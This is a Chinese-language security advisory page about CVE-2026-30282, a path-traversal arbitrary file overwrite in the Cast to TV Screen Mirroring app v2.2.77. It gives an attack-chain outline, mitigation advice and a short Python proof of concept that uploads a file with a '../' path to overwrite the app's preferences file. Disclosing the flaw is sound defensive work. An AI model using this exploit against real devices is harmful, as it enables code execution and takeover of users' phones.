IPBUF安全漏洞报告
English
CVE-2026-30282 CVSS 9.0 严重

CVE-2026-30282 Cast to TV 任意文件覆盖致代码执行

披露日期: 2026-03-31
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-30282
漏洞类型
任意文件覆盖
CVSS评分
9.0 严重
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
UXGROUP LLC Cast to TV Screen Mirroring

相关标签

任意文件覆盖RCE移动安全路径遍历

漏洞概述

UXGROUP LLC Cast to TV Screen Mirroring v2.2.77版本存在任意文件覆盖漏洞。攻击者可利用文件导入过程中的缺陷,覆盖关键内部文件,导致任意代码执行或信息泄露。

技术细节

该漏洞源于应用程序在处理文件导入功能时,未对用户提供的文件路径进行充分的验证和过滤。攻击者可以通过构造特制的HTTP请求,利用目录遍历序列(如../)指定文件保存路径。由于应用未限制导入文件的权限和目标位置,攻击者能够将恶意文件写入应用的私有数据目录或系统关键目录,覆盖原有的配置文件、库文件或二进制文件。当应用尝试加载被篡改的文件时,将执行攻击者注入的恶意代码,从而获取设备控制权。

攻击链分析

STEP 1
侦察
攻击者确认目标运行Cast to TV Screen Mirroring v2.2.77应用。
STEP 2
制作载荷
攻击者构造包含恶意代码的文件,并准备包含路径遍历字符的文件名。
STEP 3
投递载荷
攻击者诱导用户或在网络可达的情况下,通过文件导入接口上传特制文件。
STEP 4
触发漏洞
应用处理导入请求,将文件写入非预期位置,覆盖关键内部文件。
STEP 5
执行代码
应用重启或调用被覆盖文件时,执行恶意代码,获取系统权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_url): # Path traversal payload to overwrite a critical file malicious_path = "../../../../data/data/com.uxgroup.casttv/files/prefs.xml" # Simulated file upload request files = {'file': ('prefs.xml', b'<root><exec>malicious_command</exec></root>', 'text/xml')} data = {'destination': malicious_path} try: response = requests.post(f"{target_url}/api/upload", files=files, data=data) if response.status_code == 200: print("[+] File overwrite successful.") else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": exploit("http://127.0.0.1:8080")

影响范围

Cast to TV Screen Mirroring 2.2.77

防御指南

临时缓解措施
建议用户暂停使用该应用的文件导入功能,避免从不可信来源导入文件,并等待官方发布安全补丁后立即更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表